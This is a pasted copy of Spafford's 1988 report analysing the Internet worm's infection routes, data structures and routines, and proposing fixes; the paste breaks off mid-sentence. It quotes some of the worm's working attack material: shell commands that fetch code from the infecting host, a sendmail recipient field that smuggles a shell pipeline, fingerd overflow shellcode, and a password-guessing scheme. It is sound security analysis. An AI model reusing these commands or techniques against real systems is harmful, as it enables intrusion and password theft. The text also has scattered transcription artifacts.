The Internet Worm Program: An Analysis, by Eugene H. Spafford


SUBMITTED BY: Guest

DATE: July 23, 2013, 7:28 p.m.

FORMAT: Text only

SIZE: 111.0 kB

HITS: 1477

  1. The Internet Worm Program: An Analysis
  2. Purdue Technical Report CSD-TR-823
  3. Eugene H. Spafford
  4. Department of Computer Sciences Purdue University
  5. West Lafayette, IN 47907-2004
  6. spaf@cs.purdue.edu
  7. ABSTRACT
  8. On the evening of 2 November 1988, someone infected the Internet
  9. with a worm program. That program exploited flaws in utility
  10. programs in systems based on BSD-derived versions of UNIX. The
  11. flaws allowed the program to break into those machines and copy
  12. itself, thus infecting those systems. This infection eventually
  13. spread to thousands of machines, and disrupted normal activities
  14. and Internet connectivity for many days. This report gives a
  15. detailed description of the components of the worm
  16. program\320data and functions. It is based on study of two
  17. completely independent reverse-compilations of the worm and a
  18. version disassembled to VAX assembly language. Almost no source
  19. code is given in the paper because of current concerns about the
  20. state of the ``immune system'' of Internet hosts, but the
  21. description should be detailed enough to allow the reader to
  22. understand the behavior of the program. The paper contains a
  23. review of the security flaws exploited by the worm program, and
  24. gives some recommendations on how to eliminate or mitigate their
  25. future use. The report also includes an analysis of the coding
  26. style and methods used by the author\(s\) of the worm, and draws
  27. some conclusions about his abilities and intent.
  28. Copyright 1988 by Eugene H. Spafford. All rights reserved.
  29. Permission is hereby granted to make copies of this work, without
  30. charge, solely for the purposes of instruction and research. Any
  31. such copies must include a copy of this title page and copyright
  32. notice. Any other reproduction, publication, or use is strictly
  33. prohibited without express written permission. November 29, 1988
  34. The Internet Worm Program: An Analysis
  35. Purdue Technical Report CSD-TR-823
  36. Eugene H. Spafford
  37. Department of Computer Sciences
  38. Purdue University West Lafayette, IN 47907-2004
  39. spaf@cs.purdue.edu
  40. Introduction
  41. On the evening of 2 November 1988 the Internet came under attack
  42. >From within. Sometime round 6 PM EST, a program was executed on
  43. one or more hosts connected to the Internet. This program
  44. collected host, network, and user information, then broke into
  45. other machines ???using flaws present in those systems' software.
  46. After breaking in, the program would replicate itself and the
  47. replica would also attempt to infect other systems. Although the
  48. program would only infect Sun Microsystems Sun 3 systems, and VAX
  49. computers running variants of 4 BSD UNIX the program spread
  50. quickly, as did the confusion and consternation of system
  51. administrators and users as they discovered that their systems
  52. had been infected. Although UNIX has long been known to have some
  53. security weaknesses \(cf. [Ritc79], [Gram84], and [Reid87]\), the
  54. scope of the breakins came as a great surprise to almost
  55. everyone. he program was mysterious to users at sites where it
  56. appeared. Unusual files were left in the usr/tmp directories of
  57. some machines, and strange messages appeared in the log files of
  58. some of the utilities, such as the sendmail mail handling agent.
  59. The most noticeable effect, however, was that systems became more
  60. and more loaded with running processes as they became repeatedly
  61. infected. As time went on, some of these machines became so
  62. loaded that they were unable to continue any processing; some
  63. machines failed completely when their swap space or process
  64. tables were exhausted. By late Thursday night, personnel at the
  65. University of California at Berkeley and at Massachusetts
  66. Institute of Technology had ``captured'' copies of the program
  67. and began to analyze it. People at other sites also began to
  68. study the program and were developing methods of eradicating it.
  69. A common fear was that the program was somehow tampering with
  70. system resources in a way that could not be readily detected and
  71. that while a cure was being sought, system files were being
  72. altered or information destroyed. By 5 AM EST Thursday morning,
  73. less than 12 hours after the infection started on the network,
  74. the Computer Systems Research Group at Berkeley had developed an
  75. interim set of steps to halt its spread. This included a
  76. preliminary patch to the sendmail mail agent, and the suggestion
  77. to rename one or both of the C compiler and loader to prevent
  78. their use. These suggestions were published in mailing lists and
  79. on the usenet, although their spread was hampered by systems
  80. disconnecting from the Internet to attempt a ``quarantine.''
  81. By about 7 PM EST Thursday, another simple, effective method of
  82. stopping the infection, without renaming system utilities, was
  83. discovered at Purdue and also widely published. Software patches
  84. were posted by the Berkeley group at the same time to mend all
  85. the flaws that enabled the program to invade systems. All that
  86. remained was to analyze the code that caused the problems. On
  87. November 8, the National Computer Security Center held a
  88. hastily-convened workshop in Baltimore. The topic of discussion
  89. was the program and what it meant to the internet community. Who
  90. was at that meeting and why they were invited, and the topics
  91. discussed have not yet been made public.
  92. However, one thing we know that was decided by those present at
  93. the meeting was that they would not distribute copies of their
  94. reverse-engineered code to the general public. It was felt that
  95. the program exploited too many little-known techniques and that
  96. making it generally available would only provide other attackers
  97. a framework to build another such program. Although such a stance
  98. is well-intended, it can serve only as a delaying tactic. As of
  99. November 27, I am aware of at least five versions of the
  100. decompiled code, and because of the widespread distribution of
  101. the binary, I am sure there are at least ten times that many
  102. versions already completed or in progress and the required skills
  103. and tools are too readily available within the community to
  104. believe that only a few groups have the capability to reconstruct
  105. the source code. any system administrators, programmers, and
  106. managers are interested in how the program managed to establish
  107. itself on their systems and spread so quickly These individuals
  108. have valid interest in seeing the code, especially if they are
  109. software vendors. Their interest is not to duplicate the program,
  110. but to be sure that all the holes used by the program are
  111. properly plugged. Furthermore, examining the code may help
  112. administrators and vendors develop defenses against future
  113. attacks, despite the claims to the contrary by some of the
  114. individuals with copies of the reverse-engineered code. This
  115. report is intended to serve an interim role in this process. It
  116. is a detailed description of how the program works, but does not
  117. provide source code that could be used to create a new worm
  118. program. As such, this should be an aid to those individuals
  119. seeking a better understanding of how the code worked, yet it is
  120. in such a form that it cannot be used to create a new worm
  121. without considerable effort. Section 3 and Appendix C contain
  122. specific observations about some of the flaws in the system
  123. exploited by the program, and their fixes. A companion report, to
  124. be issued in a few weeks, will contain a history of the worm's
  125. spread through the Internet. This analysis is the result of a
  126. study performed on three separate reverse-engineered versions of
  127. the worm code. Two of these versions are in C code, and one in
  128. VAX assembler. All three agree in all but the most minor details.
  129. One C version of the code compiles to binary that is identical to
  130. the original code, except for minor differences of no
  131. significance. As such, I can state with some certainty that if
  132. there was only one version of the worm program, then it was
  133. benign in intent. The worm did not write to the file system
  134. except when transferring itself into a target system. It also did
  135. not transmit any information from infected systems to any site,
  136. other than copies of the worm program itself. Since the Berkeley
  137. Computer Systems Research Group as already published official
  138. fixes to the flaws exploited by the program, we do not have to
  139. worry about these specific attacks being used again. Many vendors
  140. have also issued appropriate patches. It now remains to convince
  141. the remaining vendors to issue fixes, and users to install them.
  142. Terminology
  143. There seems to be considerable variation in the names applied to
  144. the program described in this paper. I use the term worm instead
  145. of virus based on its behavior. Members of the press have used
  146. the term virus, possibly because their experience to date has
  147. been only with that form of security problem. This usage has been
  148. reinforced by quotes from computer managers and programmers also
  149. unfamiliar with the terminology. For purposes of clarifying the
  150. terminology, let me define the difference between these two terms
  151. and give some citations to their origins: worm is a program that
  152. can run by itself and can propagate a fully working version of
  153. itself to other machines. It is derived from the word tapeworm, a
  154. parasitic organism that lives inside a host and saps its
  155. resources to maintain itself. virus is a piece of code that adds
  156. itself to other programs, including operating systems. it cannot
  157. run independently and it requires that its ``host'' program be
  158. run to activate it. As such, it has a clear analog to biological
  159. viruses and those viruses are not considered alive in the usual
  160. sense; instead, they invade host cells and corrupt them, causing
  161. them to produce new viruses. The program that was loosed on the
  162. Internet was clearly a worm.
  163. 2.1. Worms
  164. The concept of a worm program that spreads itself from machine to
  165. (machine was apparently first described by John Brunner in 1975
  166. in his classic science fiction novel The Shockwave Rider.
  167. [Brun75] He called these programs tapeworms that lived
  168. ``inside'' the computers and spread themselves to other
  169. machines. In 1979-1981, researchers at Xerox PARC built and
  170. experimented with worm programs. They reported their experiences
  171. in an article in 1982 in Communications of the ACM. [Shoc82] The
  172. worms built at PARC were designed to travel from machine to
  173. machine and do useful work in a distributed environment. They
  174. were not used at that time to break into systems, although some
  175. did ``get away'' during the tests. A few people seem to prefer to
  176. call the Internet Worm a virus because it was destructive, and
  177. they believe worms are non-destructive. Not everyone agrees that
  178. the Internet Worm was destructive, however. Since intent and
  179. effect are sometimes difficult to judge, using those as a naming
  180. criterion is clearly insufficient. As such, worm continues to be
  181. the clear choice to describe this kind of program.
  182. 2.2. Viruses
  183. The first (use of the word virus \(to my knowledge\) to describe
  184. something that infects a computer was by David Gerrold in his
  185. science fiction short stories about the G.O.D. machine. These
  186. stories were later combined and expanded to form the book
  187. When Harlie Was One. [Gerr72] (A subplot in that book described a
  188. program named VIRUS created by an unethical scientist. A
  189. computer infected with VIRUS would randomly dial the phone until
  190. it found another computer. It would then break into that system
  191. and infect it with a copy of VIRUS. This program would infiltrate
  192. the system software and slow the system down so much that it
  193. became unusable except to infect other machines\). The inventor
  194. had plans to sell a program named VACCINE that could cure VIRUS
  195. and prevent infection, but disaster occurred when noise on a
  196. phone line caused VIRUS to mutate so VACCINE ceased to be
  197. effective. The term computer virus was first used in a formal
  198. way by Fred Cohen at USC. [Cohe84] He defined the term to mean
  199. a security problem that attaches itself to other code and turns
  200. it into something that produces viruses; to quote from his
  201. paper: ``We define a computer `virus' as a program that can
  202. infect other programs by modifying them to include a possibly
  203. evolved copy of itself.'' He claimed the first computer virus was
  204. ``born'' on November 3, 1983, written by himself for a security
  205. seminar course.
  206. The interested reader may also wish to consult [Denn88] and
  207. [Dewd85] for further discussion of the terms.
  208. 3. Flaws and Misfeatures
  209. 3.1. Specific Problems
  210. The actions of the Internet Worm exposed some specific security
  211. flaws in standard services provided by BSD-derived versions of
  212. UNIX. Specific patches for these flaws have been widely
  213. circulated in days since the worm program attacked the Internet.
  214. Those flaws and patches are discussed here.
  215. 3.1.1. fingerd and gets
  216. The finger program is a utility that allows users to obtain
  217. information about other users. It is usually used to identify
  218. the full name or login name of a user, whether or not a user is
  219. currently logged in, and possibly other information about the
  220. person such as telephone numbers where he or she can be reached.
  221. The fingerd program is intended to run as a daemon, or background
  222. process, to service remote requests using the finger protocol.
  223. [Harr77] The bug exploited to break fingerd involved overrunning
  224. the buffer the daemon used for input. The standard C library has
  225. a few routines that read input without checking for bounds on
  226. the buffer involved. In particular, the gets call takes input to
  227. a buffer without doing any bounds checking; this was the call
  228. exploited by the worm. The gets routine is not the only routine
  229. with this flaw. The family of routines scanf/fscanf/sscanf may
  230. also overrun buffers when decoding input unless the user
  231. explicitly specifies limits on the number of characters to be
  232. converted. Incautious use of the sprintf routine can overrun
  233. buffers. Use of the strcat/strcpy calls instead of the
  234. strncat/strncpy routines may also overflow their buffers.
  235. Although experienced C programmers are aware of the problems with
  236. these routines, they continue to use them. Worse, their format
  237. is in some sense codified not only by historical inclusion in
  238. UNIX and the C language, but more formally in the forthcoming
  239. ANSI language standard for C. The hazard with these calls is
  240. that any network server or privileged program using them may
  241. possibly be compromised by careful precalculation of the
  242. inappropriate input. An important step in removing this hazard
  243. would be first to develop a set of replacement calls that accept
  244. values for bounds on their program-supplied buffer arguments.
  245. Next, all system servers and privileged applications should be
  246. examined for unchecked uses of the original calls, with those
  247. calls then being replaced by the new bounded versions. Note that
  248. this audit has already been performed by the group at Berkeley;
  249. only the fingerd and timed servers used the gets call, and
  250. patches to fingerd have already been posted. Appendix C contains
  251. a new version of fingerd written specifically for this report
  252. that may be used to replace the original version. This version
  253. makes no calls to gets.
  254. 3.1.2. Sendmail
  255. The sendmail program is a mailer designed to route mail in a
  256. heterogeneous internetwork. [Allm83] The program operates in a
  257. number of modes, but the one of most interest is when it is
  258. operating as a daemon process. In this mode, the program is
  259. ``listening'' on (a TCP port \(#25\) for attempts to deliver
  260. mail using standard Internet protocols, principally SMTP
  261. \(Simple Mail Transfer Protocol\). [Post82] When such a request
  262. is detected, the daemon enters into a dialog with the remote
  263. mailer to determine sender, recipient, delivery instructions, and
  264. message contents. The bug exploited in sendmail had to do with
  265. functionality provided by a debugging option in the code. The
  266. worm would issue the DEBUG command to sendmail and then specify
  267. a set of commands instead of a user address as the recipient of
  268. the message. Normally, this (is not allowed, but it is present
  269. in the debugging code to allow testers to verify that mail is
  270. arriving at a particular site without the need to activate the
  271. address resolution routines. The debug option of sendmail is
  272. often used because of the complexity of configuring the mailer
  273. for local conditions, and many vendors and site administrators
  274. leave the debug option compiled in. The sendmail program is of
  275. immense importance on most Berkeley-derived \(and other\) UNIX
  276. systems because it handles the complex tasks of mail routing and
  277. delivery. Yet, despite its importance and wide-spread use, most
  278. system administrators (know little about how it works. Stories
  279. are often related about how system administrators will attempt to
  280. write new device drivers or otherwise modify the kernel of the
  281. OS, yet they will not willingly attempt to modify sendmail or
  282. its configuration files. It is little wonder, then, that bugs
  283. are present (in sendmail that allow unexpected behavior. Other
  284. flaws have been found and reported now that attention has been
  285. focused on the program, but it is not known for sure if all the
  286. bugs have been discovered and all the patches circulated. One
  287. obvious approach would be to dispose of sendmail and come (up
  288. with a simpler program to handle mail. Actually, for purposes
  289. of verification, developing a suite of cooperating programs
  290. would be a better approach, and more aligned with the UNIX
  291. philosophy. In effect, sendmail is fundamentally flawed, not
  292. because of anything related to function, (but because it is too
  293. complex and difficult to understand.
  294. The Berkeley Computer Systems Research Group has a new version of
  295. sendmail with many bug fixes and fixes for security flaws. This
  296. version of sendmail is available for FTP from the host
  297. ``ucbarpa.berkeley.edu'' and will be present in the file
  298. ~ftp/pub/sendmail.tar.Z by the end of November 1988. Note that
  299. this version is shipped with the DEBUG option disabled by
  300. default. However, this does not help system administrators who
  301. wish to enable the DEBUG option, although the researchers at
  302. Berkeley believe they have fixed (all the security flaws
  303. inherent in that facility. One approach that could be taken with
  304. the program would be to have it prompt the user for the password
  305. of the super user \(root\) when the DEBUG command is given. A
  306. static password should never be compiled into the program because
  307. (this would mean that the same password might be present at
  308. multiple sites and seldom changed. For those sites without
  309. access to FTP or otherwise unable to obtain the new version, the
  310. official patches to sendmail are enclosed in Appendix D.
  311. 3.2. Other Problems
  312. Although the worm exploited flaws in only two server programs,
  313. its behavior has served to illustrate a few fundamental problems
  314. that have not yet been widely addressed. In the interest of
  315. promoting better security, some of these problems are discussed
  316. here. (The interested reader is directed to works such as
  317. [Gram84] for a broader discussion of related issues.
  318. 3.2.1. Servers in general
  319. A security flaw not exploited by the worm, but now becoming
  320. obvious, is that many system services have configuration and
  321. command files owned by the same userid. Programs like sendmail,
  322. the at service, and other facilities are often all owned by the
  323. same (non-user id. This means that if it is possible to abuse
  324. one of the services, it might be possible to abuse many. One way
  325. to deal with the general problem is have every daemon and
  326. subsystem run with a separate userid. That way, the command and
  327. data files for each subsystem could (be protected in such a way
  328. that only that subsystem could have write \(and perhaps read\)
  329. access to the files. This is effectively an implementation of
  330. the principle of least privilege. Although doing this might add
  331. an extra dozen user ids to the system, it is a small (cost to
  332. pay, and is already sup ported in the UNIX paradigm. Services
  333. that should have separate ids include sendmail, news, at,
  334. finger, ftp, uucp and YP.
  335. 3.2.2. Passwords
  336. A key attack of the worm program involved attempts to discover
  337. user passwords. It was able to determine success because the
  338. encrypted password of each user was in a publicly readable file.
  339. This allows an attacker to encrypt lists of possible passwords
  340. and then compare them against the actual passwords without
  341. passing through any system function. In effect, the security of
  342. the passwords is provided in large part by the prohibitive effort
  343. of trying all combinations of letters. Unfortunately, as machines
  344. get faster, the cost of such attempts decreases. Dividing the
  345. task among multiple processors further reduces the time needed to
  346. decrypt a password. It (is currently feasible to use a
  347. supercomputer to precalculate all probable passwords and store
  348. them on optical media. Although not \(currently\) portable, this
  349. scheme would allow someone with the appropriate resources access
  350. to any account for which they could read the password field and
  351. then consult (their database of pre-encrypted passwords. As the
  352. density of storage media increases, this problem will only get
  353. more severe. A clear approach to reducing the risk of such
  354. attacks, and an approach that has already been taken in some
  355. variants of UNIX, would be to have a (shadow) password file. The
  356. encrypted passwords are saved in a file that is readable only by
  357. the system administrators, and a privileged call performs
  358. password encryptions and comparisons with an appropriate delay
  359. \(.5 to 1 second, for instance\). This would prevent any attempt
  360. to ``fish'' for passwords. Additionally, a threshold could be
  361. included to check for repeated password attempts from the same
  362. process, resulting in some form of alarm being raised. Shadow
  363. password files should be used in combination with encryption
  364. rather than in place of such techniques, however, or one problem
  365. is simply replaced by a different one; the combination of the
  366. two methods is stronger than either one alone. Another way to
  367. strengthen the password mechanism would be to change the utility
  368. that sets user passwords. The utility currently makes minimal
  369. attempt to ensure that new passwords are nontrivial to guess. The
  370. program could be strengthened in such a way that it would reject
  371. any choice of a word currently in the on-line dictionary or based
  372. on the account name.
  373. 4. High-Level Description of the Worm
  374. This section contains a high-level overview of how the worm
  375. program functions. The description in this section assumes that
  376. the reader is familiar with UNIX and somewhat familiar with
  377. network facilities under UNIX. Section 5 describes the individual
  378. functions and structures in more detail. The worm consists of
  379. two parts: a main program, and a bootstrap or vector program
  380. \(described in Appendix B\). We will start our description from
  381. the point at which a host is about to be infected. At this
  382. point, a worm running on another machine has either succeeded in
  383. establishing a shell on the new host and has connected back to
  384. the infecting machine via a TCP connection, or it has connected
  385. to the SMTP port and is transmitting to the sendmail program.
  386. The infection proceeded as follows: 1\) A socket was established
  387. on the infecting machine for the vector program to connect to
  388. \(e.g., socket number 32341\). A challenge string was constructed
  389. >From a random number \(e.g., 8712440\). A file name base was
  390. also constructed using a random number \(e.g., 14481910\). 2\)
  391. The vector program was installed and executed using one of two
  392. methods: 2a\) Across a TCP connection to a shell, the worm would
  393. send the following commands \(the two lines beginning with
  394. ``cc'' were sent as a single line\):
  395. PATH=/bin:/usr/bin:/usr/ucb cd /usr/tmp echo gorch49; sed '/int
  396. zz/q' > x14481910.c;echo gorch50 [text of vector
  397. program\320enclosed in Appendix B] int zz; cc (-o x14481910
  398. x14481910.c;./x14481910 128.32.134.16 32341 8712440; rm -f
  399. x14481910 x14481910.c;echo DONE
  400. Then it would wait for the string ``DONE'' to signal that the
  401. vector program was running. 2b\) Using the SMTP connection, it
  402. would transmit \(the two lines beginning with ``cc'' were sent
  403. as a single line\):
  404. debug mail from: </dev/null> rcpt to: <"|sed -e '1,/^$/'d |
  405. /bin/sh ; exit 0"> data cd /usr/tmp cat > x14481910.c <<'EOF'
  406. [text of vector program\320enclosed in Appendix III] EOF cc -o
  407. x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440; rm
  408. -f x14481910 x14481910.c . quit
  409. The infecting worm would then wait for up to 2 minutes on
  410. the designated port for the vector to contact it. 3\) The vector
  411. program then connected to the ``server,'' sent the challenge
  412. string, and transferred three files: a Sun 3 binary version of
  413. the worm, a VAX version, and the source code for the vector
  414. program. After the files were copied, the running vector program
  415. became \(via the execl call\) the shell with its input and output
  416. still connected to the server worm. 4\) The server worm sent
  417. the following command stream to the connected shell:
  418. PATH=/bin:/usr/bin:/usr/ucb rm -f sh if [ -f sh ] then
  419. P=x14481910 else P=sh fi
  420. Then, for each binary file it had transferred \(just two in this
  421. case, although the code is written (to allow more\), it would
  422. send the following form of command sequence:
  423. cc -o $P x14481910,sun3.o . /$P -p $$ x14481910,sun3.o
  424. x14481910,vax.o x14481910,l1.c rm -f $P
  425. The rm would succeed only if the linked version of the worm
  426. failed to start execution. If the server determined that the
  427. host was now infected, it closed the connection. Otherwise, it
  428. would try the other binary file. After both binary files had been
  429. tried, it would send over rm commands for the object files to
  430. clear away all evidence of the attempt at infection. 5\) The new
  431. worm on the infected host proceeded to ``hide'' itself by
  432. obscuring its argument vector, unlinking the binary version of
  433. itself, and killing its parent \(the $$ argument in the
  434. invocation\). It then read into memory each of the worm binary
  435. files, encrypted each file after reading it, and deleted the
  436. files from disk. 6\) Next, the new worm gathered information
  437. about network interfaces and hosts to which the local machine
  438. was connected. It built lists of these in memory, including
  439. information about canonical and alternate names and addresses.
  440. It gathered some of this information by making direct
  441. ioctl calls, and by running the netstat program with various
  442. arguments. It also read through various system files looking for
  443. host names to add to its database. 7\) It randomized the lists
  444. it constructed, then attempted to infect some of those hosts. For
  445. directly connected networks, it created a list of possible host
  446. numbers and attempted to infect those hosts if they existed.
  447. Depending on the type of host \(gateway or local network\), the
  448. worm first tried to establish a connection on the telnet or rexec
  449. ports to determine reachability before it attempted one of the
  450. infection methods. 8\) The infection attempts proceeded by one
  451. of three routes: rsh, fingerd, or sendmail. 8a\) The attack via
  452. rsh was done by attempting to spawn a remote shell by invocation
  453. of \(in order of trial\) /usr/ucb/rsh, /usr/bin/rsh, and
  454. /bin/rsh. If successful, the host was infected as in steps 1 and
  455. 2a, above. 8b\) The attack via the finger daemon was somewhat
  456. more subtle. A connection was established to the remote finger
  457. server daemon and then a specially constructed string of 536
  458. bytes was passed to the daemon, overflowing its input buffer and
  459. overwriting parts of the stack. For standard 4 BSD versions
  460. running on VAX computers, the overflow resulted in the return
  461. stack frame for the main routine being changed so that the
  462. return address pointed into the buffer on the stack. The
  463. instructions that were written into the stack at that location
  464. were: pushl $68732f '/sh\\0' pushl $6e69622f '/bin' movl sp,
  465. r10 pushrl $0 pushrl $0 pushrl r10 pushrl $3 movl sp,ap
  466. chmk $3b That (is, the code executed when the main routine
  467. attempted to return was: execve\("/bin/sh", 0, 0\) On VAXen,
  468. this resulted in the worm connected to a remote shell via the TCP
  469. connection. The worm then proceeded to infect the host as in
  470. steps 1 and 2a, (above. On Suns, this simply resulted in a core
  471. file since the code was not in place to corrupt a Sun version of
  472. fingerd in a similar fashion. 8c\) The worm then tried to infect
  473. the remote host by establishing a connection to the SMTP port
  474. and mailing an (infection, as in step 2b, above. Not all the
  475. steps were attempted. As soon as one method succeeded, the host
  476. entry in the internal list was marked as infected and the other
  477. methods were not attempted. 9\) Next, it entered a state machine
  478. consisting of five states. Each state (was run for a short
  479. while, then the program looped back to step #7 \(attempting to
  480. break into other hosts via sendmail, finger, or rsh \). The first
  481. four of the five states were attempts to break into user
  482. accounts on the local machine. The fifth state was the final
  483. state, and occurred after all attempts had been made to break
  484. all passwords. In the fifth state, the worm looped forever
  485. trying to infect hosts in its internal tables and marked as not
  486. yet infected. The four states were: 9a\) The worm read through
  487. the /etc/hosts.equiv files and /.rhosts files to find the names
  488. of equivalent hosts. These were marked in the internal table of
  489. hosts. Next, the worm read the /etc/passwd file into an internal
  490. data structure. As it was doing this, it also examined
  491. the .forward file in each user home directory and included those
  492. host names in its internal table of hosts to try. Oddly, it did
  493. not similarly check user .rhosts files. 9b\) The worm attempted
  494. to break each user password using simple choices. The worm
  495. checked the obvious case of no password. Then, it used the
  496. account name and GECOS field to try simple passwords. Assume
  497. that the user had an entry in the password file like:
  498. account:abcedfghijklm:100:5:User, Name:/usr/account:/bin/sh then
  499. the words tried as potential passwords would be account,
  500. accountaccount, User, Name, user, name, and tnuocca. These are,
  501. respectively, the account name, the account name concatenated
  502. with itself, the first and last names of the user, the user
  503. names with leading capital letters turned to lower case, and the
  504. account name reversed. Experience described in [Gram84]
  505. indicates that on systems where users are naive about password
  506. security, these choices may work for up to 30% of user passwords.
  507. Step 10 in this section describes what was done if a password
  508. ``hit'' was achieved. 9c\) The third stage in the process
  509. involved trying to break the password of each user by trying
  510. each word present in an internal dictionary of words \(see
  511. Appendix I\). This dictionary of 432 words was tried against
  512. each account in a random order, with ``hits'' being handled as
  513. described in step 10, below. 9d\) The fourth stage was entered
  514. if all other attempts failed. For each word in the file
  515. /usr/dict/words, the worm would see if it was the password to any
  516. account. In addition, if the word in the dictionary began with an
  517. upper case letter, the letter was converted to lower case and
  518. that word was also tried against all the passwords. 10\) Once a
  519. password was broken for any account, the worm would attempt to
  520. break into remote machines where that user had accounts. The
  521. worm would scan the .forward and .rhosts files of the user at
  522. this point, and identify the names of remote hosts that had
  523. accounts used by the target user. It then attempted two attacks:
  524. 10a\) The worm would first attempt to create a remote shell using
  525. the rexec service. The attempt would be made using the account
  526. name given in the .forward or .rhosts file and the user's local
  527. password. This took advantage of the fact that users often have
  528. the same password on their accounts on multiple machines. 10b\)
  529. The worm would do a rexec to the current host \(using the local
  530. user name and password\) and would try a rsh command to the
  531. remote host using the username taken from the file. This attack
  532. would succeed in those cases where the remote machine had a
  533. hosts.equiv file or the user had a .rhosts file that allowed
  534. remote execution without a password. If the remote shell was
  535. created either way, the attack would continue as in steps 1 and
  536. 2a, above. No other use was made of the user password.
  537. Throughout the execution of the main loop, the worm would check
  538. for other worms running on the same machine. To do this, the worm
  539. would attempt to connect to another worm on a local,
  540. predetermined TCP socket.
  541. 9
  542. If such a connection succeeded, one worm would \(randomly\) set its
  543. pleasequit variable to 1, causing that worm to exit after it had
  544. reached partway into the third stage of password cracking. This
  545. delay is part of the reason many systems had multiple worms
  546. running: even though a worm would check for other local worms, it
  547. would defer its self-destruction until significant effort had
  548. been made to break local passwords. One out of every seven worms
  549. would become immortal rather than check for other local worms.
  550. This was probably done to defeat any attempt to put a fake worm
  551. process on the TCP port to kill existing worms. It also
  552. contributed to the load of a machine once infected. The worm
  553. attempted to send an UDP packet to the host ernie.berkeley.edu
  554. 10
  555. approximately once every 15 infections, based on a random number
  556. comparison. The code to do this was incorrect, however, and no
  557. information was ever sent. Whether this was the intended ruse or
  558. whether there was actually some reason for the byte to be sent is
  559. not currently known. However, the code is such that an
  560. uninitialized byte is the intended message. It is possible that
  561. the author eventually intended to run some monitoring program on
  562. ernie \(after breaking into an account, no doubt\). Such a
  563. program could obtain the sending host number from the single-byte
  564. message, whether it was sent as a TCP or UDP packet. However, no
  565. evidence for such a program has been found and it is possible
  566. that the connection was simply a feint to cast suspicion on
  567. personnel at Berkeley. The worm would also fork itself on a
  568. regular basis and kill its parent. This served two purposes.
  569. First, the worm appeared to keep changing its process id and no
  570. single process accumulated excessive amounts of cpu time.
  571. Secondly, processes that have been running for a long time have
  572. their priority downgraded by the scheduler. By forking, the new
  573. process would regain normal scheduling priority. This mechanism
  574. did not always work correctly, either, as we locally observed
  575. some instances of the worm with over 600 seconds of accumulated
  576. cpu time. If the worm ran for more than 12 hours, it would flush
  577. its host list of all entries flagged as being immune or already
  578. infected. The way hosts were added to this list implies that a
  579. single worm might reinfect the same machines every 12 hours.
  580. 5. A Tour of the Worm
  581. The following is a brief, high-level description of the routines
  582. present in the worm code. The description covers all the
  583. significant functionality of the program, but does not describe
  584. all the auxiliary routines used nor does it describe all the
  585. parameters or algorithms involved. It should, however, give the
  586. user a complete view of how the worm functioned.
  587. 5.1. Data Structures
  588. The worm had a few global data structures worth mentioning.
  589. Additionally, the way it handled some local data is of interest.
  590. 5.1.1. Host list
  591. The worm constructed a linked list of host records. Each record
  592. contained an array of 12 character pointers to allow storage of
  593. up to 12 host names/aliases. Each record also contained an array
  594. of six long unsigned integers for host addresses, and each record
  595. contained a flag field. The only flag bits used in the code
  596. appear to be 0x01 \(host was a gateway\), 0x2 \(host has been
  597. infected\), 0x4 \(host cannot be infected \320 not reachable, not
  598. UNIX, wrong machine type\), and 0x8 \(host was ``equivalent'' in
  599. the sense that it appeared in a context like .rhosts file\).
  600. 5.1.2. Gateway List
  601. The worm constructed a simply array of gateway IP addresses
  602. through the use of the system netstat command. These addresses
  603. were used to infect directly connected networks. The use of the
  604. list is described in the explanation of scan_gateways and
  605. rt_init, below.
  606. 5.1.3. Interfaces list
  607. An array of records was filled in with information about each
  608. network interface active on the current host. This included the
  609. name of the interface, the outgoing address, the netmask, the
  610. destination host if the link was point-to-point
  611. 11
  612. , and the interface flags.
  613. 5.1.4. Pwd
  614. A linked list of records was built to hold user information. Each
  615. structure held the account name, the encrypted password, the
  616. home directory, the gecos field, and a link to the next record.
  617. A blank field was also allocated for decrypted passwords as they
  618. were found.
  619. 5.1.5. objects
  620. The program maintained an array of ``objects'' that held the
  621. files that composed the worm. Rather than have the files stored
  622. on disk, the program read the files into these internal
  623. structures. Each record in the list contained the suffix of the
  624. file name \(e.g., ``sun3.o''\), the size of the file, and the
  625. encrypted contents of the file. The use of this structure is
  626. described below.
  627. 5.1.6. Words
  628. A mini-dictionary of words was present in the worm to use in
  629. password guessing \(see Appendix A\). The words were stored in
  630. an array, and every word was masked \(XOR\) with the bit pattern
  631. 0x80. Thus, the dictionary would not show up with an invocation
  632. of the strings program on the binary or object files.
  633. 5.1.7. Embedded Strings
  634. Every text string used by the program, without exception, was
  635. masked \(XOR\) with the bit pattern 0x81. Every time a string
  636. was referenced, it was referenced via a call to XS. The XS
  637. function decrypted the requested string in a static circular
  638. buffer and returned a pointer to the decrypted version. This
  639. also kept any of the text strings in the program from appearing
  640. during an invocation of strings. Simply clearing the high order
  641. bit \(e.g., XOR 0x80\) or displaying the program binary would
  642. not produce intelligible text. All references to XS have been
  643. omitted from the following text; realize that every string was
  644. so encrypted. It is not evident how the strings were placed in
  645. the program in this manner. The masked strings were present
  646. inline in the code, so some preprocessor or a modified version of
  647. the compiler must have been used. This represents a significant
  648. effort by the author of the worm, and suggests quite strongly
  649. that the author wanted to complicate or prevent the analysis of
  650. the program once it was discovered.
  651. 5.2. Routines
  652. The descriptions given here are arranged in alphabetic order. The
  653. names of some routines are exactly as used by the author of the
  654. code. Other names are based on the function of the routine, and
  655. those names were chosen because the original routines were
  656. declared static and name information was not present in the
  657. object files. If the reader wishes to trace the functional \257ow
  658. of the worm, begin with the descriptions of routines main and
  659. doit \(presented first for this reason\). By function, the
  660. routines can be \(arbitrarily\) grouped as follows: setup and
  661. utility : main, doit, crypt, h_addaddr, h_addname, h_addr2host,
  662. h_clean, h_name2host, if_init, loadobject, makemagic, netmaskfor,
  663. permute, rt_init, supports_rsh, and supports_telnet. network &
  664. password attacks : attack_network, attack_user, crack_0, crack_1,
  665. crack_2, crack_3, cracksome, ha, hg, hi, hl, hul, infect,
  666. scan_gateways, sendworm, try_fingerd, try_password, try_rsh,
  667. try_sendmail, and waithit. camouflage: checkother, other_sleep,
  668. send_message, and xorbuf.
  669. 5.2.1. main
  670. This was where the program started. The first thing it did was
  671. change its argument vector to make it look like it was the shell
  672. running. Next, it set its resource limits so a failure would not
  673. drop a core file. Then it loaded all the files named on the
  674. command line into the object structure in memory using calls to
  675. loadobject. If the file was not one of the objects loaded, the
  676. worm would immediately call exit. Next, the code unlinked all the
  677. object files, the file named sh \(the worm itself\), and the file
  678. /tmp/.dumb \(apparently a remnant of some earlier version of the
  679. program, possibly used as a restraint or log during
  680. testing\320the file is not otherwise referenced\). The program
  681. then finished zeroing out the argument vector. Next, the code
